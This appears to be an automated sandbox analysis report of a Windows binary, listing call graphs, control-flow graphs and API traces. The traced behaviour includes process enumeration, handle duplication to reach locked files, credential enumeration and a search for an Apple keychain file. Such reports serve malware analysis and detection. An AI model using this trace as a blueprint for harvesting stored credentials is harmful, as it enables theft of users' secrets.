415d23 __aullrem __aulldvrm 38050->38056 38058 416520 38051->38058 38052 4163ca 38053 416422 10 API calls 38052->38053 38053->38051 38054 416172 memset 38054->38056 38055 416422 10 API calls 38055->38056 38056->38051 38056->38052 38056->38054 38056->38055 38057 415cb9 10 API calls 38056->38057 38057->38056 38059 416527 38058->38059 38063 416574 38058->38063 38060 415700 10 API calls 38059->38060 38061 416544 38059->38061 38059->38063 38060->38061 38062 416561 memcpy 38061->38062 38061->38063 38062->38063 38063->37999 38063->38049 38094 41bc3b 38064->38094 38067 41edad 86 API calls 38068 41f1cb 38067->38068 38069 41f1f5 memcmp 38068->38069 38070 41f20e 38068->38070 38074 41f282 38068->38074 38069->38070 38071 41f21b memcmp 38070->38071 38070->38074 38072 41f326 38071->38072 38075 41f23d 38071->38075 38073 41ee6b 86 API calls 38072->38073 38072->38074 38073->38074 38074->37852 38075->38072 38076 41f28e memcmp 38075->38076 38118 41c8df 56 API calls 38075->38118 38076->38072 38077 41f2a9 38076->38077 38077->38072 38080 41f308 38077->38080 38081 41f2d8 38077->38081 38079 41f269 38079->38072 38082 41f287 38079->38082 38083 41f27a 38079->38083 38080->38072 38120 4446ce 11 API calls 38080->38120 38084 41ee6b 86 API calls 38081->38084 38082->38076 38085 41ee6b 86 API calls 38083->38085 38086 41f2e0 38084->38086 38085->38074 38119 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38086->38119 38089->37852 38090->37852 38091->37852 38092->37848 38093->37849 38096 41bc54 38094->38096 38103 41be0b 38094->38103 38097 41bd61 38096->38097 38096->38103 38107 41bc8d 38096->38107 38121 41baf0 55 API calls 38096->38121 38099 41be45 38097->38099 38130 41a25f memset 38097->38130 38099->38067 38099->38074 38101 41be04 38128 41aee4 56 API calls 38101->38128 38103->38097 38129 41ae17 34 API calls 38103->38129 38104 41bd42 38104->38097 38104->38101 38105 41bdd8 memset 38104->38105 38106 41bdba 38104->38106 38108 41bde7 memcmp 38105->38108 38117 4175ed 6 API calls 38106->38117 38107->38097 38107->38104 38109 41bd18 38107->38109 38122 4151e3 38107->38122 38108->38101 38111 41bdfd 38108->38111 38109->38097 38109->38104 38126 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38109->38126 38110 41bdcc 38110->38097 38110->38108 38127 41a1b0 memset 38111->38127 38117->38110 38118->38079 38119->38074 38120->38072 38121->38107 38131 41837f 38122->38131 38125 444706 11 API calls 38125->38109 38126->38104 38127->38101 38128->38103 38129->38097 38130->38099 38132 4183c1 38131->38132 38135 4183ca 38131->38135 38178 418197 25 API calls 38132->38178 38136 4151f9 38135->38136 38152 418160 38135->38152 38136->38109 38136->38125 38137 4183e5 38137->38136 38161 41739b 38137->38161 38140 418444 CreateFileW 38142 418477 38140->38142 38141 41845f CreateFileA 38141->38142 38143 4184c2 memset 38142->38143 38144 41847e GetLastError ??3@YAXPAX 38142->38144 38164 418758 38143->38164 38145 4184b5 38144->38145 38146 418497 38144->38146 38179 444706 11 API calls 38145->38179 38148 41837f 49 API calls 38146->38148 38148->38136 38153 41739b GetVersionExW 38152->38153 38154 418165 38153->38154 38156 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38154->38156 38157 418178 38156->38157 38158 41817f 38157->38158 38159 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38157->38159 38158->38137 38160 418188 ??3@YAXPAX 38159->38160 38160->38137 38162 4173d6 38161->38162 38163 4173ad GetVersionExW 38161->38163 38162->38140 38162->38141 38163->38162 38165 418680 43 API calls 38164->38165 38166 418782 38165->38166 38167 418160 11 API calls 38166->38167 38169 418506 ??3@YAXPAX 38166->38169 38168 418799 38167->38168 38168->38169 38170 41739b GetVersionExW 38168->38170 38169->38136 38171 4187a7 38170->38171 38172 4187da 38171->38172 38173 4187ad GetDiskFreeSpaceW 38171->38173 38175 4187ec GetDiskFreeSpaceA 38172->38175 38177 4187e8 38172->38177 38176 418800 ??3@YAXPAX 38173->38176 38175->38176 38176->38169 38177->38175 38178->38135 38179->38136 38215 424f07 38180->38215 38182 4251e4 38183 4251f7 38182->38183 38184 4251e8 38182->38184 38223 4250f8 38183->38223 38222 4446ea 11 API calls 38184->38222 38186 4251f2 38186->37883 38188 425209 38191 425249 38188->38191 38194 4250f8 127 API calls 38188->38194 38195 425287 38188->38195 38231 4384e9 135 API calls 38188->38231 38232 424f74 124 API calls 38188->38232 38189 415c7d 16 API calls 38189->38186 38191->38195 38233 424ff0 13 API calls 38191->38233 38194->38188 38195->38189 38196 425266 38196->38195 38234 415be9 memcpy 38196->38234 38198->37877 38199->37883 38200->37883 38201->37883 38202->37883 38203->37883 38204->37888 38205->37870 38207 4442eb 38206->38207 38210 444303 38206->38210 38287 41707a 11 API calls 38207->38287 38209 4442f2 38209->38210 38288 4446ea 11 API calls 38209->38288 38210->37876 38212 444300 38212->37876 38213->37886 38214->37895 38216 424f1f 38215->38216 38217 424f0c 38215->38217 38236 424eea 11 API calls 38216->38236 38235 416760 11 API calls 38217->38235 38220 424f18 38220->38182 38221 424f24 38221->38182 38222->38186 38224 425108 38223->38224 38230 42510d 38223->38230 38269 424f74 124 API calls 38224->38269 38227 42516e 38229 415c7d 16 API calls 38227->38229 38228 425115 38228->38188 38229->38228 38230->38228 38237 42569b 38230->38237 38231->38188 38232->38188 38233->38196 38234->38195 38235->38220 38236->38221 38248 4256f1 38237->38248 38265 4259c2 38237->38265 38238 429ac1 38264 425ad6 38238->38264 38286 415c56 11 API calls 38238->38286 38243 4260dd 38281 424251 120 API calls 38243->38281 38247 429a4d 38250 429a66 38247->38250 38251 429a9b 38247->38251 38248->38238 38248->38247 38249 422aeb memset memcpy memcpy 38248->38249 38253 4260a1 38248->38253 38262 4259da 38248->38262 38248->38265 38268 425a38 38248->38268 38270 4227f0 memset memcpy 38248->38270 38271 422b84 15 API calls 38248->38271 38272 422b5d memset memcpy memcpy 38248->38272 38273 422640 13 API calls 38248->38273 38275 4241fc 11 API calls 38248->38275 38276 42413a 90 API calls 38248->38276 38249->38248 38282 415c56 11 API calls 38250->38282 38255 429a96 38251->38255 38284 416760 11 API calls 38251->38284 38279 415c56 11 API calls 38253->38279 38285 424251 120 API calls 38255->38285 38258 429a7a 38283 416760 11 API calls 38258->38283 38280 416760 11 API calls 38262->38280 38264->38227 38265->38264 38274 415c56 11 API calls 38265->38274 38268->38265 38277 422640 13 API calls 38268->38277 38278 4226e0 12 API calls 38268->38278 38269->38230 38270->38248 38271->38248 38272->38248 38273->38248 38274->38262 38275->38248 38276->38248 38277->38268 38278->38268 38279->38262 38280->38243 38281->38264 38282->38258 38283->38255 38284->38255 38285->38238 38286->38262 38287->38209 38288->38212 38289->37899 40150 4147f3 40153 414561 40150->40153 40152 414813 40154 41456d 40153->40154 40155 41457f GetPrivateProfileIntW 40153->40155 40158 4143f1 memset _itow WritePrivateProfileStringW 40154->40158 40155->40152 40157 41457a 40157->40152 40158->40157

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                  APIs
                                                  • memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                  • memset.MSVCRT ref: 0040DF5F
                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                  • API String ID: 594330280-3398334509
                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 594 413ee4 590->594 595 413ee7-413efe 590->595 604 413ea2-413eae CloseHandle 592->604 598 413e61-413e68 593->598 599 413e37-413e44 GetModuleHandleW 593->599 594->595 595->580 598->592 601 413e6a-413e76 598->601 599->598 600 413e46-413e5c GetProcAddress 599->600 600->598 601->592 604->583
                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                  • memset.MSVCRT ref: 00413D7F
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                  • memset.MSVCRT ref: 00413E07
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                  • API String ID: 912665193-1740548384
                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                  • memcpy.MSVCRT ref: 0040B60D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                  • String ID: BIN
                                                  • API String ID: 1668488027-1015027815
                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFind$FirstNext
                                                  • String ID:
                                                  • API String ID: 1690352074-0
                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0041898C
                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InfoSystemmemset
                                                  • String ID:
                                                  • API String ID: 3558857096-0
                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                  APIs
                                                  • memset.MSVCRT ref: 004455C2
                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 0044570D
                                                  • memset.MSVCRT ref: 00445725
                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                    • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  • memset.MSVCRT ref: 0044573D
                                                  • memset.MSVCRT ref: 00445755
                                                  • memset.MSVCRT ref: 004458CB
                                                  • memset.MSVCRT ref: 004458E3
                                                  • memset.MSVCRT ref: 0044596E
                                                  • memset.MSVCRT ref: 00445A10
                                                  • memset.MSVCRT ref: 00445A28
                                                  • memset.MSVCRT ref: 00445AC6
                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  • memset.MSVCRT ref: 00445B52
                                                  • memset.MSVCRT ref: 00445B6A
                                                  • memset.MSVCRT ref: 00445C9B
                                                  • memset.MSVCRT ref: 00445CB3
                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                  • memset.MSVCRT ref: 00445B82
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                  • memset.MSVCRT ref: 00445986
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                  • API String ID: 2745753283-3798722523
                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                  • String ID: $/deleteregkey$/savelangfile
                                                  • API String ID: 2744995895-28296030
                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                  • wcsrchr.MSVCRT ref: 0040B738
